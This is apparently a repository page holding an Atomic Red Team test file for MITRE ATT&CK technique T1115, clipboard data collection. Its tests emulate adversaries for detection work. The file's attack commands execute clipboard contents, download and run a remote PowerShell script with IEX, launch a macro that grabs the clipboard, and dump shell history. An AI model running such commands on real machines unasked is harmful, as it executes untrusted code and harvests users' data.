security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1115/T1115.md
T
Atomic Red Team doc generator 5ede8f21e4 Generated docs from job=generate-docs branch=master [ci skip]
2025-02-13 22:03:40 +00:00

205 lines
4.5 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
# T1115 - Clipboard Data
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1115)
<blockquote>
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
For example, on Windows adversaries can access clipboard data by using <code>clip.exe</code> or <code>Get-Clipboard</code>.(Citation: MSDN Clipboard)(Citation: clip_win_server)(Citation: CISA_AA21_200B) Additionally, adversaries may monitor then replace users clipboard with their data (e.g., [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002)).(Citation: mining_ruby_reversinglabs)
macOS and Linux also have commands, such as <code>pbpaste</code>, to grab clipboard contents.(Citation: Operating with EmPyre)
</blockquote>
## Atomic Tests
- [Atomic Test #1 - Utilize Clipboard to store or execute commands from](#atomic-test-1---utilize-clipboard-to-store-or-execute-commands-from)
- [Atomic Test #2 - Execute Commands from Clipboard using PowerShell](#atomic-test-2---execute-commands-from-clipboard-using-powershell)
- [Atomic Test #3 - Execute commands from clipboard](#atomic-test-3---execute-commands-from-clipboard)
- [Atomic Test #4 - Collect Clipboard Data via VBA](#atomic-test-4---collect-clipboard-data-via-vba)
- [Atomic Test #5 - Add or copy content to clipboard with xClip](#atomic-test-5---add-or-copy-content-to-clipboard-with-xclip)
<br/>
## Atomic Test #1 - Utilize Clipboard to store or execute commands from
Add data to clipboard to copy off or execute commands from.
**Supported Platforms:** Windows
**auto_generated_guid:** 0cd14633-58d4-4422-9ede-daa2c9474ae7
#### Attack Commands: Run with `command_prompt`!
```cmd
dir | clip
echo "T1115" > %temp%\T1115.txt
clip < %temp%\T1115.txt
```
#### Cleanup Commands:
```cmd
del %temp%\T1115.txt >nul 2>&1
```
<br/>
<br/>
## Atomic Test #2 - Execute Commands from Clipboard using PowerShell
Utilize PowerShell to echo a command to clipboard and execute it
**Supported Platforms:** Windows
**auto_generated_guid:** d6dc21af-bec9-4152-be86-326b6babd416
#### Attack Commands: Run with `powershell`!
```powershell
echo Get-Process | clip
Get-Clipboard | iex
```
<br/>
<br/>
## Atomic Test #3 - Execute commands from clipboard
Echo a command to clipboard and execute it
**Supported Platforms:** macOS
**auto_generated_guid:** 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff
#### Attack Commands: Run with `bash`!
```bash
echo ifconfig | pbcopy
$(pbpaste)
```
<br/>
<br/>
## Atomic Test #4 - Collect Clipboard Data via VBA
This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt
**Supported Platforms:** Windows
**auto_generated_guid:** 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ms_product | Maldoc application Word | string | Word|
#### Attack Commands: Run with `powershell`!
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"
```
#### Cleanup Commands:
```powershell
Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Microsoft #{ms_product} must be installed
##### Check Prereq Commands:
```powershell
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
<br/>
<br/>
## Atomic Test #5 - Add or copy content to clipboard with xClip
Utilize Linux Xclip to copy history and place in clipboard then output to a history.txt file. Successful execution will capture history and output to a file on disk.
**Supported Platforms:** Linux
**auto_generated_guid:** ee363e53-b083-4230-aff3-f8d955f2d5bb
#### Attack Commands: Run with `sh`!
```sh
apt install xclip -y
history | tail -n 30 | xclip -sel clip
xclip -o > history.txt
```
<br/>
Reference in New Issue View Git Blame Copy Permalink